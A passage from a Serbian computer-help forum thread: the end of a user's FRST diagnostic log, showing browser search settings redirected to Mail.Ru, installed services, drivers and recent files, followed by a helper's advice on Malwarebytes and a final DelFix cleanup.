Tcpip\..\Interfaces\{0AAFBB01-C496-474D-8BC2-940C0A776BD8}: [NameServer] 172.21.21.158 172.21.21.157
Tcpip\..\Interfaces\{578AA652-166E-433B-86EA-9467752D23F8}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{5DAACF19-081A-4322-9054-F1578CC1D2BD}: [DhcpNameServer] 89.216.1.30 89.216.1.50
Tcpip\..\Interfaces\{724FAD3D-C7A8-435F-B037-9FF54294D378}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{F503BD61-4609-4AE6-8B95-4C67A8ABD4A1}: [DhcpNameServer] 192.168.42.129

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com
HKU\S-1-5-21-1739059202-3565848293-805263540-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp
SearchScopes: HKU\S-1-5-21-1739059202-3565848293-805263540-1000 -> DefaultScope {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL =
BHO: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.150\McAfeeMSS_IE.dll [2014-04-09] (McAfee, Inc.)
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2014-04-25] (Microsoft Corporation)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2014-01-23] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2014-04-08] (Microsoft Corporation)
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2014-04-01] (Microsoft Corporation)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\ASUS\AppData\Roaming\Mozilla\Firefox\Profiles\ij5a11r8.default [2017-04-28]
FF NewTab: Mozilla\Firefox\Profiles\ij5a11r8.default -> about:newtab
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\ij5a11r8.default -> Поиск@Mail.Ru
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\ij5a11r8.default -> Поиск@Mail.Ru
FF Homepage: Mozilla\Firefox\Profiles\ij5a11r8.default -> hxxps://www.google.rs/
FF Keyword.URL: Mozilla\Firefox\Profiles\ij5a11r8.default -> hxxp://go.mail.ru/distib/ep/?product_id=%7B6FED2366-7EC4-400F-AC64-DB273A71E665%7D&gp=811037
FF SearchPlugin: C:\Users\ASUS\AppData\Roaming\Mozilla\Firefox\Profiles\ij5a11r8.default\searchplugins\mailru.xml [2017-04-21]
FF Extension: (Skype) - C:\Program Files\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2016-01-06]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_25_0_0_148.dll [2017-04-25] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2014-01-23] (Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.33.4\npGoogleUpdate3.dll [2017-04-27] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.33.4\npGoogleUpdate3.dll [2017-04-27] (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2017-03-28] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1739059202-3565848293-805263540-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\ASUS\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2016-05-08] (Unity Technologies ApS)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2014-01-23] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll [2017-03-28] (Adobe Systems Inc.)

Chrome:
=======
CHR HomePage: Default -> hxxps://mail.ru/cnt/11956636?rciguc__PARAM__
CHR StartupUrls: Default -> "hxxp://mail.ru/cnt/10445?gp=811040"
CHR NewTab: Default -> "chrome-extension://oelpkepjlgmehajehfeicfbjdiobdkfj/visual-bookmarks.html"

CHR DefaultSearchURL: Default -> hxxp://go.mail.ru/distib/ep/?q={searchTerms}&product_id=%7B43A7E749-EF1D-4494-A885-6758E5B4AA85%7D&gp=811041
CHR DefaultSearchKeyword: Default -> mail.ru
CHR DefaultSuggestURL: Default -> hxxp://suggests.go.mail.ru/ff3?q={searchTerms}
CHR Profile: C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default [2017-04-21]
CHR Extension: (Docs) - C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-03-07]
CHR Extension: (No Name) - C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-03-07]
CHR Extension: (No Name) - C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-03-07]
CHR Extension: (No Name) - C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-03-07]
CHR Extension: (No Name) - C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-12-04]
CHR Extension: (No Name) - C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-07]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 c2cautoupdatesvc; C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2016-01-08] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2016-01-08] (Microsoft Corporation)
S3 Disc Soft Bus Service; C:\Program Files\DAEMON Tools Ultra\DiscSoftBusService.exe [813328 2014-04-28] (Disc Soft Ltd)
R2 HWDeviceService.exe; C:\ProgramData\DatacardService\HWDeviceService.exe [276048 2013-02-06] ()
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [3303888 2017-01-20] (Malwarebytes)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [235696 2014-04-09] (McAfee, Inc.)
S2 mts mobilni internet. RunOuc; C:\Program Files\mts mobilni internet\UpdateDog\ouc.exe [656976 2013-05-21] ()
S3 Sony PC Companion; C:\Program Files\Sony\Sony PC Companion\PCCService.exe [155520 2015-06-10] (Avanquest Software)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2009-07-14] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 andnetadb; C:\Windows\System32\Drivers\lgandnetadb.sys [25856 2014-05-27] (Google Inc)
S3 AndnetBus; C:\Windows\System32\DRIVERS\lgandnetbus.sys [15744 2014-05-27] (LG Electronics Inc.)
S3 AndNetDiag; C:\Windows\System32\DRIVERS\lgandnetdiag.sys [23168 2014-05-27] (LG Electronics Inc.)
S3 ANDNetModem; C:\Windows\System32\DRIVERS\lgandnetmodem.sys [27776 2014-05-27] (LG Electronics Inc.)
S3 andnetndis; C:\Windows\System32\DRIVERS\lgandnetndis.sys [74240 2014-05-27] (LG Electronics Inc.)
R3 dtscsibus; C:\Windows\System32\DRIVERS\dtscsibus.sys [24704 2014-05-24] (Disc Soft Ltd)
R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae.sys [59904 2017-03-22] ()
R3 FsUsbExDisk; C:\Windows\system32\FsUsbExDisk.SYS [36608 2010-06-14] () [File not signed]
S3 ggsomc; C:\Windows\System32\DRIVERS\ggsomc.sys [26328 2015-08-24] (Sony Mobile Communications)
S3 huawei_cdcacm; C:\Windows\System32\DRIVERS\ew_jucdcacm.sys [101248 2013-03-04] (Huawei Technologies Co., Ltd.)
S3 huawei_ext_ctrl; C:\Windows\System32\DRIVERS\ew_juextctrl.sys [27776 2013-03-04] (Huawei Technologies Co., Ltd.)
S3 huawei_wwanecm; C:\Windows\System32\DRIVERS\ew_juwwanecm.sys [208384 2013-06-29] (Huawei Technologies Co., Ltd.)
R2 MBAMChameleon; C:\Windows\system32\drivers\MBAMChameleon.sys [161216 2017-04-27] (Malwarebytes)
R3 MBAMFarflt; C:\Windows\system32\drivers\farflt.sys [96704 2017-04-28] (Malwarebytes)
S3 MBAMProtection; C:\Windows\system32\drivers\mbam.sys [39360 2017-04-28] (Malwarebytes)
R0 MBAMSwissArmy; C:\Windows\System32\drivers\MBAMSwissArmy.sys [220088 2017-04-28] (Malwarebytes)
R3 MBAMWebProtection; C:\Windows\system32\drivers\mwac.sys [64288 2017-04-28] (Malwarebytes)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-04-28 09:25 - 2017-04-28 09:27 - 00011593 _____ C:\Users\ASUS\Desktop\FRST.txt
2017-04-27 14:00 - 2017-04-28 09:26 - 00096704 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
2017-04-27 14:00 - 2017-04-28 09:26 - 00064288 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2017-04-27 14:00 - 2017-04-28 09:26 - 00039360 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2017-04-27 13:59 - 2017-04-27 13:59 - 00002020 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2017-04-27 13:59 - 2017-04-27 13:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-04-27 13:59 - 2017-04-27 13:59 - 00000000 ____D C:\Program Files\Malwarebytes
2017-04-27 13:59 - 2017-03-22 11:02 - 00059904 _____ C:\Windows\system32\Drivers\mbae.sys
2017-04-25 21:38 - 2017-04-25 22:01 - 00000000 ____D C:\Users\ASUS\Desktop\Warcraft.2016.720p.BluRay.x264.ShAaNiG
2017-04-25 21:27 - 2017-04-25 21:27 - 00802904 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2017-04-25 21:27 - 2017-04-25 21:27 - 00144472 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2017-04-25 20:21 - 2017-04-25 20:21 - 00000000 ____D C:\Users\ASUS\AppData\LocalLow\Oracle
2017-04-25 20:19 - 2017-04-25 20:19 - 56134208 _____ (Oracle Corporation) C:\Users\ASUS\Downloads\JavaSetup.exe
2017-04-25 19:33 - 2017-04-28 09:25 - 00000000 ____D C:\FRST
2017-04-25 19:33 - 2017-04-27 13:52 - 01768448 _____ (Farbar) C:\Users\ASUS\Desktop\FRST.exe
2017-04-21 12:05 - 2017-04-21 12:05 - 00000000 ____D C:\Users\ASUS\AppData\LocalLow\Unity
2017-04-21 12:00 - 2017-04-21 12:23 - 00000000 ____D C:\Users\ASUS\AppData\Local\Mail.Ru
2017-04-21 12:00 - 2017-04-21 12:00 - 00000000 ____D C:\ProgramData\Mail.Ru
2017-04-14 20:47 - 2017-04-14 20:55 - 00000000 ___HD C:\Users\ASUS\AppData\Local\SysHashTable
2017-04-03 20:23 - 2017-04-28 01:06 - 00000000 ____D C:\Users\ASUS\AppData\LocalLow\Mozilla
2017-04-03 20:12 - 2017-04-27 07:49 - 00000000 ____D C:\Program Files\Mozilla Firefox

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-04-28 09:26 - 2015-05-26 17:58 - 00220088 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2017-04-28 09:24 - 2009-07-14 06:53 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-04-27 23:41 - 2010-11-20 23:01 - 00778150 _____ C:\Windows\system32\PerfStringBackup.INI
2017-04-27 23:41 - 2009-07-14 04:37 - 00000000 ____D C:\Windows\inf
2017-04-27 14:00 - 2015-05-26 17:56 - 00161216 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2017-04-27 13:59 - 2015-05-26 17:58 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-04-27 13:49 - 2009-07-14 06:33 - 00434504 _____ C:\Windows\system32\FNTCACHE.DAT
2017-04-27 08:28 - 2009-07-14 04:37 - 00000000 ___HD C:\Windows\system32\GroupPolicy
2017-04-25 21:36 - 2014-05-22 23:13 - 00000000 ____D C:\Users\ASUS\AppData\Roaming\uTorrent
2017-04-25 21:28 - 2015-01-05 15:00 - 00000000 ____D C:\Users\ASUS\AppData\Local\Adobe
2017-04-25 21:27 - 2014-05-24 15:07 - 00000000 ____D C:\Windows\system32\Macromed
2017-04-25 20:27 - 2009-07-14 04:37 - 00000000 ____D C:\PerfLogs
2017-04-25 20:11 - 2009-07-14 06:34 - 00021072 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-04-25 20:11 - 2009-07-14 06:34 - 00021072 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-04-25 20:05 - 2014-08-12 22:39 - 00000000 ____D C:\Users\ASUS\AppData\Local\ElevatedDiagnostics
2017-04-21 12:26 - 2015-03-07 21:23 - 00000000 ____D C:\Program Files\Google
2017-04-21 11:52 - 2015-12-24 11:42 - 00001105 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2017-04-21 11:52 - 2014-05-22 21:42 - 00001117 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-04-21 11:35 - 2014-06-29 13:07 - 00000000 ____D C:\Windows\Minidump
2017-04-21 11:35 - 2014-05-24 16:10 - 00000000 ____D C:\Program Files\CCleaner
2017-04-15 14:18 - 2015-01-07 13:42 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2017-04-08 20:45 - 2015-03-07 21:24 - 00002143 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk

==================== Files in the root of some directories =======

2016-02-03 10:16 - 2016-02-03 10:16 - 0963707 _____ () C:\Users\ASUS\AppData\Local\MP4-Player_242.rar
2015-01-13 14:01 - 2015-01-13 14:01 - 0001025 _____ () C:\Users\ASUS\AppData\Local\recently-used.xbel

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => MD5 is legit
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-02-14 21:59

==================== End of FRST.txt ============================
https://www.mycity.rs/must-login.png

offline
  • Pridružio: 26 Avg 2010
  • Poruke: 10621
  • Gde živiš: Hypnos Control Room, Tokyo Metropolitan Government Building

Isprati ovo uputstvo da deaktiviraš trial verziju MBAM-a i da je pretvoriš u Free verziju koja nema realtime zaštitu.

https://support.malwarebytes.com/customer/en/porta.....ebytes-3-0

Javi kakvo je stanje nakon toga.

offline
  • Pridružio: 26 Mar 2011
  • Poruke: 221

Mislim da je stanje malo bolje,da li treba jos nesto da odradim...ili da pratim stanje,da li treba sada da obrisem frst...neki zastitni program da instaliram,ovaj Malwarebites da obrise...uglavnom sledim dalja upustva.

offline
  • Pridružio: 26 Avg 2010
  • Poruke: 10621
  • Gde živiš: Hypnos Control Room, Tokyo Metropolitan Government Building

Imaš jako spor procesor pa bi ga bilo koji AV jako usporio. Probaj da reinstaliraš MBAM i da vidiš kakvo je onda stanje. Mojati je preporuka da MBAM-om ponekad skeniraš računar.


Arrow

Sledeća procedura će implementirati završno čišćenje.

Arrow Preuzmi "Xplode"-ov DelFix alat i snimi ga na Desktop.
Dvoklikom pokreni alat i štikliraj kućice ispred sledećih opcija;

Remove disinfection tools
Create registry backup
Purge System Restore


Klikni na dugme Run i pričekaj trenutak dok alat ne završi svoj rad.
Od ovog trenutka, svi korišćeni alati u ovoj temi bi trebali biti obrisani.
Alat će takođe formirati izveštaj za tebe. (C:\DelFix.txt)

Alat će snimiti i zdravo stanje registy-ja i napraviti backup koristeci integrisan program "ERUNT" u %windir%\ERUNT\DelFix
Alat briše stare system restore tačke i pravi novu, svežu tačku nakon čišćenja.

Ko je trenutno na forumu
 

Ukupno su 614 korisnika na forumu :: 29 registrovanih, 6 sakrivenih i 579 gosta   ::   [ Administrator ] [ Supermoderator ] [ Moderator ] :: Detaljnije

Najviše korisnika na forumu ikad bilo je 3466 - dana 01 Jun 2021 17:07

Korisnici koji su trenutno na forumu:
Korisnici trenutno na forumu: A.R.Chafee.Jr., bbelic, crnitrn, Cufo, ikan, Kaplar2, Kruger, KUZMAR, ladro, Marko Marković, mcgunner, miodrag, Misha V, moldway, Neutral-M, Panonsky, Polemarchoi, raskoljnikov, royst33, Sr.Stat., stegonosa, styg, tmanda323, voja64, vukdra, x9, Yellow Pinky, zeljkodjokovic, zlaya011